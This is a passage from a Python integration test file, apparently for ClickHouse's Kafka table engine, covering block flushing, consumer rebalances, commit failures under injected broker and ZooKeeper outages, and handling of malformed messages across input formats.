SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush_by_block_size',
kafka_group_name = 'flush_by_block_size',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_poll_max_batch_size = 1,
kafka_flush_interval_ms = 120000, /* should not flush by time during test */
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
# Wait for Kafka engine to consume this data
while 1 != int(instance.query(
"SELECT count() FROM system.parts WHERE database = 'test' AND table = 'view' AND name = 'all_1_1_0'")):
time.sleep(0.5)
cancel.set()
kafka_thread.join()
# more flushes can happen during the test; we only need to check the result of the first flush (the part named all_1_1_0).
result = instance.query("SELECT count() FROM test.view WHERE _part='all_1_1_0'")
# logging.debug(result)
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# 100 = the first poll should return 100 messages (and rows)
# without waiting for stream_flush_interval_ms
assert int(
result) == 100, 'Messages from kafka should be flushed when block of size kafka_max_block_size is formed!'
def test_kafka_lot_of_partitions_partial_commit_of_bulk(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "topic_with_multiple_partitions2"
kafka_create_topic(admin_client, topic_name, num_partitions=10)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'topic_with_multiple_partitions2',
kafka_group_name = 'topic_with_multiple_partitions2',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 211,
kafka_flush_interval_ms = 500;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
count = 0
for dummy_msg in range(1000):
rows = []
for dummy_row in range(random.randrange(3, 10)):
count = count + 1
rows.append(json.dumps({'key': count, 'value': count}))
messages.append("\n".join(rows))
kafka_produce(kafka_cluster, 'topic_with_multiple_partitions2', messages)
instance.wait_for_log_line('kafka.*Stalled', repetitions=5)
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
logging.debug(result)
assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(count))
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_delete_topic(admin_client, topic_name)
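# Rebalance scenario: 11 consumer tables share one consumer group on an 11-partition topic; they are
# created one by one and later dropped while a producer keeps writing, triggering repeated rebalances.
# The final check is that no message was consumed twice (count() == uniqExact(key)).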
def test_kafka_rebalance(kafka_cluster):
NUMBER_OF_CONSURRENT_CONSUMERS = 11
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
''')
# kafka_cluster.open_bash_shell('instance')
# time.sleep(2)
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "topic_with_multiple_partitions"
kafka_create_topic(admin_client, topic_name, num_partitions=11)
cancel = threading.Event()
msg_index = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(59):
messages.append(json.dumps({'key': msg_index[0], 'value': msg_index[0]}))
msg_index[0] += 1
kafka_produce(kafka_cluster, 'topic_with_multiple_partitions', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
for consumer_index in range(NUMBER_OF_CONSURRENT_CONSUMERS):
table_name = 'kafka_consumer{}'.format(consumer_index)
logging.debug(("Setting up {}".format(table_name)))
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
CREATE TABLE test.{0} (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'topic_with_multiple_partitions',
kafka_group_name = 'rebalance_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 33,
kafka_flush_interval_ms = 500;
CREATE MATERIALIZED VIEW test.{0}_mv TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp,
'{0}' as _consumed_by
FROM test.{0};
'''.format(table_name))
# kafka_cluster.open_bash_shell('instance')
# Waiting for test.kafka_consumerX to start consuming ...
instance.wait_for_log_line('kafka_consumer{}.*Polled offset [0-9]+'.format(consumer_index))
cancel.set()
# Intentionally leave the last one working (to finish consuming after all the rebalances)
for consumer_index in range(NUMBER_OF_CONSURRENT_CONSUMERS - 1):
logging.debug(("Dropping test.kafka_consumer{}".format(consumer_index)))
instance.query('DROP TABLE IF EXISTS test.kafka_consumer{} SYNC'.format(consumer_index))
# logging.debug(instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination'))
# kafka_cluster.open_bash_shell('instance')
while 1:
messages_consumed = int(instance.query('SELECT uniqExact(key) FROM test.destination'))
if messages_consumed >= msg_index[0]:
break
time.sleep(1)
logging.debug(("Waiting for finishing consuming (have {}, should be {})".format(messages_consumed, msg_index[0])))
logging.debug((instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination')))
# Some queries to debug...
# SELECT * FROM test.destination where key in (SELECT key FROM test.destination group by key having count() <> 1)
# select number + 1 as key from numbers(4141) x left join test.destination using (key) where test.destination.key = 0;
# SELECT * FROM test.destination WHERE key between 2360 and 2370 order by key;
# select _partition from test.destination group by _partition having count() <> max(_offset) + 1;
# select toUInt64(0) as _partition, number + 1 as _offset from numbers(400) x left join test.destination using (_partition,_offset) where test.destination.key = 0 order by _offset;
# SELECT * FROM test.destination WHERE _partition = 0 and _offset between 220 and 240 order by _offset;
# CREATE TABLE test.reference (key UInt64, value UInt64) ENGINE = Kafka SETTINGS kafka_broker_list = 'kafka1:19092',
# kafka_topic_list = 'topic_with_multiple_partitions',
# kafka_group_name = 'rebalance_test_group_reference',
# kafka_format = 'JSONEachRow',
# kafka_max_block_size = 100000;
#
# CREATE MATERIALIZED VIEW test.reference_mv Engine=Log AS
# SELECT key, value, _topic,_key,_offset, _partition, _timestamp, 'reference' as _consumed_by
# FROM test.reference;
#
# select * from test.reference_mv left join test.destination using (key,_topic,_offset,_partition) where test.destination._consumed_by = '';
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.destination'))
for consumer_index in range(NUMBER_OF_CONSURRENT_CONSUMERS):
logging.debug(("kafka_consumer{}".format(consumer_index)))
table_name = 'kafka_consumer{}'.format(consumer_index)
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
'''.format(table_name))
instance.query('''
DROP TABLE IF EXISTS test.destination;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
kafka_delete_topic(admin_client, topic_name)
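# Simulates losing the ZooKeeper connection between writing the prefix and the suffix of a block
# to a Replicated* target table; offsets must not be committed for the failed block, so after the
# connection heals all 22 messages should end up in the view exactly once (no holes).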
def test_kafka_no_holes_when_write_suffix_failed(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': 'x' * 300}) for j in range(22)]
kafka_produce(kafka_cluster, 'no_holes_when_write_suffix_failed', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'no_holes_when_write_suffix_failed',
kafka_group_name = 'no_holes_when_write_suffix_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20,
kafka_flush_interval_ms = 2000;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = ReplicatedMergeTree('/clickhouse/kafkatest/tables/no_holes_when_write_suffix_failed', 'node1')
ORDER BY key;
''')
# init PartitionManager earlier (it starts its container)
pm = PartitionManager()
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(0.25);
''')
instance.wait_for_log_line("Polled batch of 20 messages")
# the tricky part here is that the disconnect should happen after the write prefix, but before the write suffix;
# we have a 0.25 (sleepEachRow) * 20 (rows) = 5 sec window after "Polled batch of 20 messages"
# while the materialized view is working, in which to inject the ZooKeeper failure
pm.drop_instance_zk_connections(instance)
instance.wait_for_log_line("Error.*(session has been expired|Connection loss).*while writing suffix to view")
pm.heal_all()
instance.wait_for_log_line("Committed offset 22")
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
logging.debug(result)
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert TSV(result) == TSV('22\t22\t22')
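# A SELECT from this Kafka table (empty kafka_group_name) fails; the test verifies that the exception raised
# while tearing the consumer down does not take the server with it: the table can still be dropped, recreated
# and dropped again, and the server keeps answering queries (SELECT 1).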
def test_exception_from_destructor(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'xyz',
kafka_group_name = '',
kafka_format = 'JSONEachRow';
''')
instance.query_and_get_error('''
SELECT * FROM test.kafka;
''')
instance.query('''
DROP TABLE test.kafka;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'xyz',
kafka_group_name = '',
kafka_format = 'JSONEachRow';
''')
instance.query('''
DROP TABLE test.kafka;
''')
# kafka_cluster.open_bash_shell('instance')
assert TSV(instance.query('SELECT 1')) == TSV('1')
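# Drops the Kafka table while a block is still being accumulated and recreates it with a different
# kafka_max_block_size; offsets of messages that were polled but not yet flushed must not be committed,
# so no data is lost: the destination should contain every produced key exactly once.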
def test_commits_of_unprocessed_messages_on_drop(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(1)]
kafka_produce(kafka_cluster, 'commits_of_unprocessed_messages_on_drop', messages)
instance.query('''
DROP TABLE IF EXISTS test.destination SYNC;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000,
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.kafka_consumer TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
# Waiting for test.kafka_consumer to start consuming
instance.wait_for_log_line('Committed offset [0-9]+')
cancel = threading.Event()
i = [2]
def produce():
while not cancel.is_set():
messages = []
for _ in range(113):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
kafka_produce(kafka_cluster, 'commits_of_unprocessed_messages_on_drop', messages)
time.sleep(0.5)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
time.sleep(4)
instance.query('''
DROP TABLE test.kafka SYNC;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10000,
kafka_flush_interval_ms = 1000;
''')
cancel.set()
instance.wait_for_log_line('kafka.*Stalled', repetitions=5)
# kafka_cluster.open_bash_shell('instance')
# SELECT key, _timestamp, _offset FROM test.destination where runningDifference(key) <> 1 ORDER BY key;
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.destination')
logging.debug(result)
instance.query('''
DROP TABLE test.kafka_consumer SYNC;
DROP TABLE test.destination SYNC;
''')
kafka_thread.join()
assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(i[0] - 1)), 'Missing data!'
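# Regression test for consumer rescheduling: 20000 messages should be consumed in a steady stream, so the
# spread between the first and the last consume_ts in the destination is expected to stay under 8 seconds.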
def test_bad_reschedule(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(20000)]
kafka_produce(kafka_cluster, 'test_bad_reschedule', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_bad_reschedule',
kafka_group_name = 'test_bad_reschedule',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000,
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.destination Engine=Log AS
SELECT
key,
now() as consume_ts,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
instance.wait_for_log_line("Committed offset 20000")
assert int(instance.query("SELECT max(consume_ts) - min(consume_ts) FROM test.destination")) < 8
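# The Kafka broker container is paused right after a batch is polled, so the offset commit fails; the
# rebalance triggered afterwards (see the librdkafka issue referenced below) makes the batch get re-consumed,
# and the test asserts the resulting, properly reported duplication (42 rows for 22 distinct keys).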
def test_kafka_duplicates_when_commit_failed(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': 'x' * 300}) for j in range(22)]
kafka_produce(kafka_cluster, 'duplicates_when_commit_failed', messages)
instance.query('''
DROP TABLE IF EXISTS test.view SYNC;
DROP TABLE IF EXISTS test.consumer SYNC;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'duplicates_when_commit_failed',
kafka_group_name = 'duplicates_when_commit_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20,
kafka_flush_interval_ms = 1000;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree()
ORDER BY key;
''')
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(0.25);
''')
instance.wait_for_log_line("Polled batch of 20 messages")
# the tricky part here is that the disconnect should happen after the write prefix, but before we do the commit;
# we have a 0.25 (sleepEachRow) * 20 (rows) = 5 sec window after "Polled batch of 20 messages"
# while the materialized view is working, in which to inject the failure (here: pausing the Kafka broker container)
kafka_cluster.pause_container('kafka1')
# if we restore the connection too fast (<30 sec), librdkafka will not report any timeout
# (an alternative is to decrease librdkafka's default session timeouts)
#
# when the delay is too long (>50 sec), the broker will decide to remove us from the consumer group
# and will start answering "Broker: Unknown member"
instance.wait_for_log_line("Exception during commit attempt: Local: Waiting for coordinator", timeout=45)
instance.wait_for_log_line("All commit attempts failed", look_behind_lines=500)
kafka_cluster.unpause_container('kafka1')
# kafka_cluster.open_bash_shell('instance')
instance.wait_for_log_line("Committed offset 22")
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
logging.debug(result)
instance.query('''
DROP TABLE test.consumer SYNC;
DROP TABLE test.view SYNC;
''')
# After https://github.com/edenhill/librdkafka/issues/2631
# the timeout triggers a rebalance, making further commits to the topic impossible after getting back online.
# So we get a duplicate in that scenario, but we report that situation properly.
assert TSV(result) == TSV('42\t22\t22')
# if we reach the end of a partition we will repeat polling until reaching kafka_max_block_size or flush_interval.
# That behavior is a bit questionable - we could just take bigger pauses between polls instead -
# to do more work in a single pass and give the thread more rest.
# But in case of spiky loads on the kafka topic the current contract sounds more predictable and
# easier to understand, so let's keep it as is for now.
# Also, we can reach EOF because we drained the librdkafka internal queue too fast.
def test_premature_flush_on_eof(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'premature_flush_on_eof',
kafka_group_name = 'premature_flush_on_eof',
kafka_format = 'JSONEachRow';
SELECT * FROM test.kafka LIMIT 1;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
''')
# messages created here will be consumed immediately after the MV creation,
# reaching the topic EOF.
# But we should not flush immediately after reaching EOF, because
# the next poll can return more data, and we should respect kafka_flush_interval_ms
# and try to form a bigger block
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(1)]
kafka_produce(kafka_cluster, 'premature_flush_on_eof', messages)
instance.query('''
CREATE MATERIALIZED VIEW test.kafka_consumer TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
# all subscriptions/assignments are done during the SELECT, so it starts sending data to test.destination
# immediately after the MV is created
instance.wait_for_log_line("Polled batch of 1 messages")
instance.wait_for_log_line("Stalled")
# produce more messages after delay
kafka_produce(kafka_cluster, 'premature_flush_on_eof', messages)
# data was not flushed yet (it will be flushed 7.5 sec after creating MV)
assert int(instance.query("SELECT count() FROM test.destination")) == 0
instance.wait_for_log_line("Committed offset 2")
# it should be a single part, i.e. a single insert
result = instance.query('SELECT _part, count() FROM test.destination group by _part')
assert TSV(result) == TSV('all_1_1_0\t2')
instance.query('''
DROP TABLE test.kafka_consumer;
DROP TABLE test.destination;
''')
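# The broker is paused before the Kafka table is created; queries against it should not fail, and once the
# broker is unpaused the engine is expected to catch up and deliver all 20000 pre-produced messages.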
def test_kafka_unavailable(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(20000)]
kafka_produce(kafka_cluster, 'test_bad_reschedule', messages)
kafka_cluster.pause_container('kafka1')
instance.query('''
CREATE TABLE test.test_bad_reschedule (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_bad_reschedule',
kafka_group_name = 'test_bad_reschedule',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000;
CREATE MATERIALIZED VIEW test.destination_unavailable Engine=Log AS
SELECT
key,
now() as consume_ts,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.test_bad_reschedule;
''')
instance.query("SELECT * FROM test.test_bad_reschedule")
instance.query("SELECT count() FROM test.destination_unavailable")
# enough to trigger issue
time.sleep(30)
kafka_cluster.unpause_container('kafka1')
while int(instance.query("SELECT count() FROM test.destination_unavailable")) < 20000:
print("Waiting for consume")
time.sleep(1)
def test_kafka_issue14202(kafka_cluster):
"""
INSERT INTO Kafka Engine from an empty SELECT sub query was leading to failure
"""
instance.query('''
CREATE TABLE test.empty_table (
dt Date,
some_string String
)
ENGINE = MergeTree()
PARTITION BY toYYYYMM(dt)
ORDER BY some_string;
CREATE TABLE test.kafka_q (t UInt64, `some_string` String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue14202',
kafka_group_name = 'issue14202',
kafka_format = 'JSONEachRow';
''')
instance.query(
'INSERT INTO test.kafka_q SELECT t, some_string FROM ( SELECT dt AS t, some_string FROM test.empty_table )')
# check instance is alive
assert TSV(instance.query('SELECT 1')) == TSV('1')
instance.query('''
DROP TABLE test.empty_table;
DROP TABLE test.kafka_q;
''')
def test_kafka_csv_with_thread_per_consumer(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'csv_with_thread_per_consumer',
kafka_group_name = 'csv_with_thread_per_consumer',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n',
kafka_num_consumers = 4,
kafka_thread_per_consumer = 1;
''')
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
kafka_produce(kafka_cluster, 'csv_with_thread_per_consumer', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
def random_string(size=8):
return ''.join(random.choices(string.ascii_uppercase + string.digits, k=size))
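# With kafka_handle_error_mode = 'stream', rows that fail to parse are not thrown away: they are exposed
# through the _raw_message/_error virtual columns, so one MV collects good rows and another collects errors.
# Half of the 128 produced messages are intentionally malformed, hence the expected 64/64 split.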
def test_kafka_engine_put_errors_to_stream(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.kafka_data;
DROP TABLE IF EXISTS test.kafka_errors;
CREATE TABLE test.kafka (i Int64, s String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_engine_put_errors_to_stream',
kafka_group_name = 'kafka_engine_put_errors_to_stream',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 128,
kafka_handle_error_mode = 'stream';
CREATE MATERIALIZED VIEW test.kafka_data (i Int64, s String)
ENGINE = MergeTree
ORDER BY i
AS SELECT i, s FROM test.kafka WHERE length(_error) == 0;
CREATE MATERIALIZED VIEW test.kafka_errors (topic String, partition Int64, offset Int64, raw String, error String)
ENGINE = MergeTree
ORDER BY (topic, offset)
AS SELECT
_topic AS topic,
_partition AS partition,
_offset AS offset,
_raw_message AS raw,
_error AS error
FROM test.kafka WHERE length(_error) > 0;
''')
messages = []
for i in range(128):
if i % 2 == 0:
messages.append(json.dumps({'i': i, 's': random_string(8)}))
else:
# Unexpected json content for table test.kafka.
messages.append(json.dumps({'i': 'n_' + random_string(4), 's': random_string(8)}))
kafka_produce(kafka_cluster, 'kafka_engine_put_errors_to_stream', messages)
instance.wait_for_log_line("Committed offset 128")
assert TSV(instance.query('SELECT count() FROM test.kafka_data')) == TSV('64')
assert TSV(instance.query('SELECT count() FROM test.kafka_errors')) == TSV('64')
instance.query('''
DROP TABLE test.kafka;
DROP TABLE test.kafka_data;
DROP TABLE test.kafka_errors;
''')
def gen_normal_json():
return '{"i":1000, "s":"ABC123abc"}'
def gen_malformed_json():
return '{"i":"n1000", "s":"1000"}'
def gen_message_with_jsons(jsons = 10, malformed = 0):
s = io.StringIO()
# we don't care at which position the error is added
# (we skip the whole broken message), but we need to be
# sure that at least one error is added,
# otherwise the test will fail.
error_pos = random.randint(0,jsons-1)
for i in range (jsons):
if malformed and i == error_pos:
s.write(gen_malformed_json())
else:
s.write(gen_normal_json())
s.write(' ')
return s.getvalue()
def test_kafka_engine_put_errors_to_stream_with_random_malformed_json(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.kafka_data;
DROP TABLE IF EXISTS test.kafka_errors;
CREATE TABLE test.kafka (i Int64, s String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_engine_put_errors_to_stream_with_random_malformed_json',
kafka_group_name = 'kafka_engine_put_errors_to_stream_with_random_malformed_json',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_poll_max_batch_size = 1,
kafka_handle_error_mode = 'stream';
CREATE MATERIALIZED VIEW test.kafka_data (i Int64, s String)
ENGINE = MergeTree
ORDER BY i
AS SELECT i, s FROM test.kafka WHERE length(_error) == 0;
CREATE MATERIALIZED VIEW test.kafka_errors (topic String, partition Int64, offset Int64, raw String, error String)
ENGINE = MergeTree
ORDER BY (topic, offset)
AS SELECT
_topic AS topic,
_partition AS partition,
_offset AS offset,
_raw_message AS raw,
_error AS error
FROM test.kafka WHERE length(_error) > 0;
''')
messages = []
for i in range(128):
if i % 2 == 0:
messages.append(gen_message_with_jsons(10, 1))
else:
messages.append(gen_message_with_jsons(10, 0))
kafka_produce(kafka_cluster, 'kafka_engine_put_errors_to_stream_with_random_malformed_json', messages)
instance.wait_for_log_line("Committed offset 128")
# 64 good messages, each containing 10 rows
assert TSV(instance.query('SELECT count() FROM test.kafka_data')) == TSV('640')
# 64 bad messages, each containing some broken row
assert TSV(instance.query('SELECT count() FROM test.kafka_errors')) == TSV('64')
instance.query('''
DROP TABLE test.kafka;
DROP TABLE test.kafka_data;
DROP TABLE test.kafka_errors;
''')
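# For every supported input format the test feeds a few valid samples plus one deliberately broken message;
# valid rows must reach the data MV, while the broken message must surface in the errors MV with the exact
# raw_message/error pair listed in 'expected' for that format.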
def test_kafka_formats_with_broken_message(kafka_cluster):
# data was dumped from clickhouse itself in the following manner
# clickhouse-client --format=Native --query='SELECT toInt64(number) as id, toUInt16( intDiv( id, 65536 ) ) as blockNo, reinterpretAsString(19777) as val1, toFloat32(0.5) as val2, toUInt8(1) as val3 from numbers(100) ORDER BY id' | xxd -ps | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
all_formats = {
## Text formats ##
# dumped with clickhouse-client ... | perl -pe 's/\n/\\n/; s/\t/\\t/g;'
'JSONEachRow': {
'data_sample': [
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"1","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"2","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"3","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"4","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"5","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"6","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"7","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"8","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"9","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"10","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"11","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"12","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"13","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"14","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"15","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
# broken message
'{"id":"0","blockNo":"BAD","val1":"AM","val2":0.5,"val3":1}',
],
'expected':'''{"raw_message":"{\\"id\\":\\"0\\",\\"blockNo\\":\\"BAD\\",\\"val1\\":\\"AM\\",\\"val2\\":0.5,\\"val3\\":1}","error":"Cannot parse input: expected '\\"' before: 'BAD\\",\\"val1\\":\\"AM\\",\\"val2\\":0.5,\\"val3\\":1}': (while reading the value of key blockNo)"}''',
'supports_empty_value': True,
'printable': True,
},
# JSONAsString doesn't fit this test and is tested separately
'JSONCompactEachRow': {
'data_sample': [
'["0", 0, "AM", 0.5, 1]\n',
'["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["0", 0, "AM", 0.5, 1]\n',
# broken message
'["0", "BAD", "AM", 0.5, 1]',
],
'expected':'''{"raw_message":"[\\"0\\", \\"BAD\\", \\"AM\\", 0.5, 1]","error":"Cannot parse input: expected '\\"' before: 'BAD\\", \\"AM\\", 0.5, 1]': (while reading the value of key blockNo)"}''',
'supports_empty_value': True,
'printable':True,
},
'JSONCompactEachRowWithNamesAndTypes': {
'data_sample': [
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
# broken message
'["0", "BAD", "AM", 0.5, 1]',
],
'expected':'''{"raw_message":"[\\"0\\", \\"BAD\\", \\"AM\\", 0.5, 1]","error":"Cannot parse JSON string: expected opening quote"}''',
'printable':True,
},
'TSKV': {
'data_sample': [
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
